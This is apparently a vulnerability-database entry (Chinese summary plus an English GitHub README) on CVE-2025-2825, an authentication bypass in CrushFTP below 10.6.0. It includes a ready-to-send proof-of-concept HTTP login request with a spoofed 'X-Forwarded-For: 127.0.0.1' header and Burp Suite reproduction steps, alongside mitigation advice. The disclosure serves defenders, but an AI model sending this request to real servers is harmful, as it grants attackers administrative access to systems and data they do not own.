CrushFTP 认证绕过漏洞
漏洞信息
漏洞名称: CrushFTP 认证绕过漏洞
漏洞编号:
- CVE: CVE-2025-2825
漏洞类型: 权限绕过
漏洞等级: 严重
漏洞描述: CrushFTP是一个广泛使用的安全文件传输服务器,提供了高效的文件传输解决方案,常见于企业环境中用于安全地共享和传输文件。由于其广泛的应用,该漏洞的影响范围较大。
该漏洞属于认证绕过类型,技术根源在于服务器对X-Forwarded-For头的验证不足。当攻击者将该头设置为127.0.0.1时,服务器会错误地将请求视为来自本地,从而绕过正常的认证检查,允许攻击者无需有效凭证即可获得管理员权限。
此漏洞的安全风险极高,攻击者可以远程利用此漏洞,无需任何形式的认证,即可完全控制受影响的CrushFTP服务器。这可能导致敏感数据泄露、服务中断,甚至服务器被用作进一步攻击的跳板。由于漏洞利用简单且自动化工具易于开发,预计该漏洞将被广泛利用。
产品厂商: CrushFTP
产品名称: CrushFTP
影响版本: version < 10.6.0
来源: https://github.com/Shivshantp/CVE-2025-2825-CrushFTP-AuthBypass
类型: CVE-2025:github search
仓库文件
- README.md
来源概述
🚨 CVE-2025-2825 – CrushFTP Authentication Bypass
Overview
CVE-2025-2825 is a critical authentication bypass vulnerability affecting CrushFTP, a widely used secure file transfer server. The flaw allows remote attackers to bypass login authentication and gain administrative access by spoofing headers — essentially tricking the server into thinking the request came from the localhost.
- Severity: Critical
- CVSS Score: 9.8
- Attack Vector: Remote
- Affected Versions: CrushFTP < v10.6.0
- Fixed In: v10.6.0 and above
- Status: Under active exploitation in the wild
🔍 Technical Details
The vulnerability is due to insufficient validation of the X-Forwarded-For header. When this header is set to 127.0.0.1, the server trusts the request as if it originated locally, bypassing authentication checks.
🧪 Proof of Concept (PoC)
HTTP Request Example:
GET /WebInterface/login.html?command=validate&username=Admin&password=any HTTP/1.1
Host: target-ip
X-Forwarded-For: 127.0.0.1
📝 Replace target-ip with the target server’s IP.
If successful, the server will treat the request as local and allow administrative login — even with incorrect credentials.
🛠️ Tools & Technologies Used
- Python – for automation and script testing
- Burp Suite – intercept and modify HTTP headers
- Wireshark – network analysis and monitoring
- Nmap – port and service detection
- CrushFTP – vulnerable instance (v10.5 or older)
- GitHub – for documentation and PoC publication
📌 Steps to Reproduce
- Set up a vulnerable instance of CrushFTP (v10.5 or below).
- Open Burp Suite and intercept the login request.
- Modify the HTTP header:
X-Forwarded-For: 127.0.0.1 - Forward the request.
- Observe that the authentication is bypassed, and admin access is granted.
✅ Mitigation
- Upgrade to CrushFTP v10.6.0 or later.
- Block or sanitize trusted headers like
X-Forwarded-For. - Restrict access to admin interfaces via firewall or VPN.
- Monitor logs for unusual access from
127.0.0.1.
👨💻 Author
Shivshant Patil
Certified Ethical Hacker (CEH v13)
B.Tech Computer Engineering Graduate
LinkedIn Profile